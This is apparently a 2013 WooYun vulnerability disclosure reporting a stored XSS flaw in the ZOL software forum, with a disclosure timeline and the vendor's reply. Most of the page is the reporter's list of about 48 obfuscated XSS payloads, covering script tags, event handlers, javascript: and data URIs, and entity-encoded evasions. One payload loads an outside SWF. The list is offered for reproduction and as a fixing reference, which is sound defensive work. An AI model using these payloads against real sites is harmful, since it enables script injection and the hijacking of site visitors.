当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037263

漏洞标题:中关村在线软件论坛存储型xss

相关厂商:中关村在线

漏洞作者: mramydnei

提交时间:2013-09-16 10:59

修复时间:2013-10-31 11:00

公开时间:2013-10-31 11:00

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-16: 细节已通知厂商并且等待厂商处理中
2013-09-16: 厂商已经确认,细节仅向厂商公开
2013-09-26: 细节向核心白帽子及相关领域专家公开
2013-10-06: 细节向普通白帽子公开
2013-10-16: 细节向实习白帽子公开
2013-10-31: 细节向公众公开

简要描述:

过滤不严。

详细说明:

过滤不言导致可通过抓改包植入恶意的xss代码。

zol1.jpg

漏洞证明:

zol2.jpg

修复方案:

由于是多个xss vector同时插入测试的,所以不确定是完全没有过滤,还是正则被打乱了
在这儿提供1下我平时做xss测试的vectors.方便审核人员场景重现,zol也可以作为漏洞修补的参考

<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
<script>alert([!![]]+[])</script>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script>
<script>prompt(-[])</script>
<script firefox>alert(1)</script>
<SCRIPT>+alert("2")</SCRIPT>
<script>alert(/3/)</script>
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/4/)></script>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(5)></script> ?
<script>alert(String.fromCharCode(49))</script>
<script>alert(/7/.source)</script>
<script>setTimeout('alert(8)',0)</script>
<button/onclick=alert(9) >KCF</button>
<form><button formaction=javascript&colon;alert(10)>CLICKME
<a href=javascript:confirm(11)>asd</a>
<a onmouseover=(alert(12))>KCF</a>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(13)>ClickMe
<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="white"/></a> </svg>
<p/onmouseover=javascript:alert(15); >KCF</p>
<img src=x onerror=alert(16)>
<img src ?itworksonchrome?\/onerror = alert(17)>
<img src=x onerror=window.open('http://18.com');>
<img/src/onerror=alert(19)>
<img src="x:kcf" onerror="alert(20)">
<body/onload=alert(21)>
<body onscroll=alert(22)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<body oninput=alert(23)><input autofocus>
<var onmouseover="prompt(24)">KCF</var>
<div/onmouseover='alert(25)'>X
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;26&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;29&Tab;%29></iframe>
<iframe SRC="http://0x.lv/xss.swf"></iframe>
<IFRAME SRC="javascript:alert(27);"></IFRAME>
<meta http-equiv="refresh" content="0;javascript&colon;alert(28)"/>?
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E">
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
<marquee onstart="alert('31')"></marquee>
<isindex type=image src=1 onerror=alert(32)>
<isindex action=javascript:alert(33) type=image>
<input onfocus=javascript:alert(34) autofocus>
<input onblur=javascript:alert(35) autofocus><input autofocus>
<select onfocus=javascript:alert(36) autofocus>
<textarea onfocus=javascript:alert(37) autofocus>
<keygen onfocus=javascript:alert(38) autofocus>
<FRAMESET><FRAME SRC="javascript:alert(39);"></FRAMESET>
<frameset onload=alert(40)>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCg0MSk8L3NjcmlwdD4="></embed>
<embed src=javascript:alert(42)>
<svg onload="javascript:alert(43)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(44)"></g></svg>
<math href="javascript:javascript:alert(45)">CLICKME</math>
<video><source onerror="alert(46)">
<audio src=x onerror=alert(47)>
<video src=x onerror=alert(48)>


辛苦了。

版权声明:转载请注明来源 mramydnei@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-09-16 11:07

厂商回复:

我去跟负责人沟通下,这个问题之前与他们聊过,不能完全屏蔽掉全部标签,感谢提交

最新状态:

暂无